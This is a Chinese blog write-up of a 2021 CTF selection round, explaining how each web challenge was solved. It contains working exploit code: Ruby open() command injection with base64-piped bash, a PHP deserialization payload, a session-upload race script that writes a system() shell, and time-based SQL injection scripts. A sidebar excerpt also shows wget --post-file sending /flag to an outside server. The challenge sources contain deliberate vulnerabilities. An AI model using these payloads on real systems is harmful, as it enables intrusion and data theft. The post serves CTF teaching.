第三届第五空间网络安全大赛-选拔赛-部分Writeup

于 2021-09-17 03:47:18 发布 1572 收藏 5
分类专栏: CTF_WEB_Writeup 文章标签: 第三届第五空间网络安全大赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/120339790
版权

文章目录

MISC

签到

在这里插入图片描述

flag{welcometo5space}

WEB

WebFTP

在这里插入图片描述
目录扫描发现git泄露
在这里插入图片描述

在这里插入图片描述
使用GitHack尝试还原代码
在这里插入图片描述
发现无法还原源代码,但是发现了几个可以正常访问的文件,其中最为有用的就是这个探针:/Readme/mytz.php
在这里插入图片描述
无法还原源码,但是在访问/.git/config时发现了源码在github上的项目
在这里插入图片描述
下载,搜索引擎没找到什么可利用的洞。查看探针,尝试看看先出一个phpinfo看看一些基本信息

发现了查看phpinfo的方法
在这里插入图片描述
查看phpinfo时,尝试找了下有没有将flag写进环境变量的情况时发现flag
在这里插入图片描述

PNG图片转换器

在这里插入图片描述
ruby的源代码

require 'sinatra'
require 'digest'
require 'base64'

get '/' do
  open("./view/index.html", 'r').read()
end

get '/upload' do
  open("./view/upload.html", 'r').read()
end

post '/upload' do
  unless params[:file] && params[:file][:tempfile] && params[:file][:filename] && params[:file][:filename].split('.')[-1] == 'png'
    return "<script>alert('error');location.href='/upload';</script>"
  end
  begin
    filename = Digest::MD5.hexdigest(Time.now.to_i.to_s + params[:file][:filename]) + '.png'
    open(filename, 'wb') { |f|
      f.write open(params[:file][:tempfile],'r').read()
    }
    "Upload success, file stored at #{filename}"
  rescue
    'something wrong'
  end

end

get '/convert' do
  open("./view/convert.html", 'r').read()
end

post '/convert' do
  begin
    unless params['file']
      return "<script>alert('error');location.href='/convert';</script>"
    end

    file = params['file']
    unless file.index('..') == nil && file.index('/') == nil && file =~ /^(.+)\.png$/
      return "<script>alert('dont hack me');</script>"
    end
    res = open(file, 'r').read()
    headers 'Content-Type' => "text/html; charset=utf-8"
    "var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"
  rescue
    'something wrong'
  end
end

漏洞利用的关键点是这一行

res = open(file, 'r').read()

参考:https://vulhub.org/#/environments/ruby/CVE-2017-17405/

这里使用了open()函数来打开可控制file参数传入的文件名。而ruby中的open()函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。

源码中会将open()执行过后的结果base64编码后返回,加上file参数处有些过滤和必须以.png结尾的限制;即可构造

file=|whoami > test.png

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
如果返回something wrong,可以尝试多执行几次。

接下来绕过../即可,直接利用base64编码绕过

file=|echo "bHMgLWxoYSAv"|base64 -d|bash > test.png

在这里插入图片描述

在这里插入图片描述
读取/FLA9_zAIBhoJmWSX9RUcnPDrL

file=|echo "Y2F0IC9GTEE5X3pBSUJob0ptV1NYOVJVY25QRHJM"|base64 -d|bash > test.png

在这里插入图片描述
在这里插入图片描述

pklovecloud

在这里插入图片描述

 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

简单的反序列化,需要注意下的就是两个对象相互嵌套时注意区分,不要陷入死循环

<?php 
class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct($i) 
    {   
        if($i == 1)
        {
            $this->cinder = new ace();
        }else{
            return $i;
        }
    }  
 
}  

class ace
{    
    public $filename = '/flag.php';     
    public $openstack;
    public $docker; 
    function __construct()
    {
        $this->docker = serialize(new acp(0));
    }
}  

$res = new acp(1);
echo urlencode(serialize($res));
 ?>

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A9%3A%22%2Fflag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A61%3A%22O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BN%3Bs%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

在这里插入图片描述

EasyCleanup

在这里插入图片描述

 <?php

if(!isset($_GET['mode'])){
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    $shell = $_GET['shell'] ?? 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell);
}


if(isset($_GET['file'])){
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
    include $_GET['file'];
}


function filter($var): bool{
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];

    foreach($banned as $ban){
        if(strstr($var, $ban)) return True;
    }

    return False;
}

function checkNums($var): bool{
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphanum); $i++){
        for($j = 0; $j < strlen($var); $j++){
            if($var[$j] == $alphanum[$i]){
                $cnt += 1;
                if($cnt > 8) return True;
            }
        }
    }
    return False;
}

?>

合并运算符(??)

$shell = $_GET['shell'] ?? 'phpinfo();'

如果有设置?shell,则?shell的值为其设置的值;若没有设置,则?shell=phpinfo();

审计源码,很明显这里直接命令执行应该是无法执行的:

  • 总长度不能大于等于15
  • 数字和字母的字符次数不能大于等于8次

加上一些filter()的过滤,这里基本无法实现?shell的命令执行

关键在include $_GET['file'];,有文件包含,虽然有filter()和长度的限制,但是没有最恶心的CheckNums();加上给了我们一个phpinfo。查看一下session.upload_progress,默认都是开启的。并且这里记录上传进度的session文件都没有开启自动清除(session.upload_progress.cleanup==Off),条件竞争都不用做了。
在这里插入图片描述
没有给出session.save_path,那sesion应该就是默认保存位置:/tmp/sess_xxx
直接利用以前做session upload progress的脚本即可,稍微改一下就能直接打

# -*- coding: utf-8 -*-
import io
import requests
import threading

myurl = 'http://114.115.134.72:32770/index.php'
sessid = '7'
myfile = io.BytesIO(b'mochu7' * 1024)
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('ls -lha /');?>"}
mycookie = {'PHPSESSID': sessid}

def writeshell(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('mochu7.txt', myfile)}, cookies=mycookie)

def getshell(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break
        else:
            pass


if __name__ == '__main__':
    session = requests.session()
    writeshell = threading.Thread(target=writeshell, args=(session,))
    writeshell.daemon = True
    writeshell.start()
    getshell(session)

在这里插入图片描述
在这里插入图片描述
如果一个sess_id打了好几次没有刷新,建议换个sess_id

yet_another_mysql_injection

在这里插入图片描述
在这里插入图片描述
查看源码发现提示
在这里插入图片描述

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
    die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}

if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

password处可以进行延迟注入的,

import requests

burp0_url = "http://114.115.143.25:32770/index.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                 "Accept-Encoding": "gzip, deflate",
                 "Content-Type": "application/x-www-form-urlencoded",
                 }
all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"

query_str = ''
for length in range(1, 20):
    for char in all_print_str:
        payload = "mochu7'or/**/if(ascii(mid(database(),{0},1))/**/like/**/{1},benchmark(20000000,md5('mochu7')),1)#".format(length, ord(char))
        burp0_data = {"username": "admin", "password": payload}
        resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
        # print('{} : {} : {}'.format(length, char, resp.elapsed.total_seconds()))
        if resp.elapsed.total_seconds() > 3:
            query_str += char
            print(query_str)
        else:
            continue

数据库是ctf。但是查password字段的时候发现无法查询出数据。这张表应该是张空表。
那么只能想办法构造出$row['password'] === $password

参考Nu1L战队的Writeup的思路:https://wx.zsxq.com/dweb2/index/group/824215518412

在这里插入图片描述
performance_schema.threads表中的PROCESSLIST_INFO会记录线程正在执行的完整语句

https://dev.mysql.com/doc/refman/5.7/en/performance-schema-threads-table.html
在这里插入图片描述
在这里插入图片描述
但是in被过滤,所以这里需要用无列名注入,PROCESSLIST_INFOperformance_schema.threads表中的第11个字段。

当我们插入这条payload之后,整条的查询语句

SELECT password FROM users WHERE username='admin' and password='1'union/**/select/**/mid(`11`,65,217)/**/from(select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/union/**/select/**/*/**/from/**/performance_schema.threads/**/where/**/name/**/like'%connection%'/**/limit/**/1,1)t#

查询语句中的内联注释符/**/,是被记录成空格的。
在这里插入图片描述

SELECT password FROM users WHERE username='admin' and password='1'union select mid(`11`,65,217) from(select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 union select * from performance_schema.threads where name like'%connection%' limit 1,1)t#

在这里插入图片描述

可以看到,最后截断PROCESSLIST_INFO记录的语句得到查询结果和我们输入的password的参数是一样的。

构造出$row['password'] === $password,即可得到flag
在这里插入图片描述

末初mochu7
微信扫码订阅
UP更新不错过~
关注
  • 6
    点赞
  • 5
    收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
2021第五空间WEB
~airrudder~
02-24 1373
2021第五空间web部分复现
2022第五空间网络安全大赛
Pysnow's Blog
09-19 1621
2022第五空间网络安全大赛
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 3512
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 2643
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
[第五空间 2021]yet_another_mysql_injection
最新发布
bossDDYY的博客
11-10 212
打开题目 查看源码 发现可用信息。,试试登录,返回flag。
2022年第五空间网络安全大赛WriteUp
渗透测试研究中心
09-22 4578
一、WEB1.web_BaliYun进去之后一个文件上传,而且只能上传图片。访问www.zip拿到源码网站源码:index.php:<?phpinclude("class.php");if(isset($_GET['img_name'])){$down=newcheck_img();#hereecho$down->img_check();}if(isset...
第五空间web复现
unexpectedthing的博客
09-27 303
@[]
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 285
[第五空间 2021] wp
StrangeLanguage WriteUp(第三届第五空间网络安全大赛reverse wp)
Drawlonely的博客
09-18 1330
StrangeLanguage WriteUp 题目给了main.exe,看大小和图标判断是使用pyinstaller将py文件打包成的可执行文件,简单运行,让你输入(猜测输入flag),然后会有提示"nonono" 提取py 使用工具PyInstaller Extractor可直接提出pyc,再使用Uncompyle6反编译就能得到main.py python .\pyinstxtractor.py main.exe cd .\main.exe_extracted\ uncompyle6 main.py
羊城杯2021-网络安全大赛部分writeup
克格莫
09-11 2030
1.签到 <?php echo("SangFor{".md5("28-08-30-07-04-20-02-17-23-01-12-19")."}"); ?> 图1是二八定律(28),图2是八卦(8),图3是三十而立(30),图4是北斗七星(07),图5是江南四大才子(04),图6是歼20(20),图7是两个黄鹂(02),图8是一起来看流星雨(一起谐音17),图9是乔丹的球服(23),图10是一马当先(01),图11是十二星座(12),图12是19点播放的新闻联播(19) ...
陇原战“疫“2021网络安全大赛Writeup
Le1a's Blog
11-08 5760
Web CheckIN 源代码的这两处: 先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了 接着尝试利用wget的--post-file进行数据外带,读取源代码 在自己VPS开个监听并且构造: /wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/ 拿到flag: flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f} Misc
2021第五届强网杯网络安全挑战赛决赛-crypto writeup
blog
07-15 686
title: 2021第五届强网杯网络安全挑战赛决赛-crypto writeup date: 2021-07-11 16:42:54+08:00 author: ljahum categories: notes tags: crypto hiddenFromHomePage: false description: “强网杯2021” math: enable: true 2021第五届强网杯网络安全挑战赛决赛-crypto writeup 不垫底就算成功???????????? 蛮恶心的,差点
CTF题目记录1
kkzzjx
05-06 899
记录各种教程上的例题和oj做题记录 今日来源–ctf wiki 2018 DEFCON Quals ghettohackers: Throwback 题目描述如下 Anyo!e!howouldsacrificepo!icyforexecu!!onspeedthink!securityisacomm!ditytop!urintoasy!tem! 第一直觉应该是我们去补全这些叹号对应的内容,从而得到...
第二届强网杯部分writeup
weixin_30457465的博客
04-11 213
0x00 题目名称签到 操作内容: FLAG值: flag{welcome_to_qwb} 0x01题目名称Weclome 操作内容: 通过查看文件发现是一个bmp格式的图片文件,然后加上后缀.bmp,如图 将图片放入色道,通过变换得到flag FLAG值: QWB{W3lc0me} 0x02题目名称streamgame1操作内容: 密码...
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 1829
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
2021 第五空间 ctf wp
qq_45603443的博客
09-23 1642
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
第五空间Writeup_Web
Lethe's Blog
09-03 972
空相 (1)进入页面,提示了参数id (2)尝试一下:?id=1‘ (3)
2021第五空间webakwp
fmyyy1的博客
09-18 642
前言 挺傻逼的,5道web题全是静态靶机,三道rce题,一直有人搅屎,不知道主办方咋想的。 附一张图 不过也算是ak了web 总体感觉还不错 webftp 这题就要说到搅屎的问题了,我直接扫路径扫到1.txt看到flag,大概是哪位大师傅放的 赛后跟别的师傅聊了一下,预期解是github上能下载源码然后看就行。 EasyCleanup 源码逻辑很简单,给了phpinfo和任意文件包含 这里的 session.upload_progress.cleanup 是off的,不会自动清除session文件 那
第三届第五空间网络安全大赛 Web复现
Sk1y的博客
09-24 668
环境还没关,良心比赛方,赶紧趁着复现复现 文章目录pklovecloudPNG图片转换器EasyCleanupyet_another_mysql_injectionWebFTP pklovecloud 是个pop链,需要注意的地方是acp类型中的成员cinder是protected属性的,序列化之后会增加三个字符%00*%00(url编码之后) <?php include 'flag.php'; class pkshow { function echo_name()
第五空间部分Writeup
SkYe's Blog
06-26 493
twice 分析 保护情况 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 漏洞函数 程序一共有两次输入的机会,第一次输入长度为 0x50+9 ;第二次输入长度为:0x50+0x20 。存储字符串的变量 s 距离 rbp 是 0x60 ,也就是第二次输入是栈溢出,溢出长度仅可覆盖 rip 。 输入处理函数: __

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值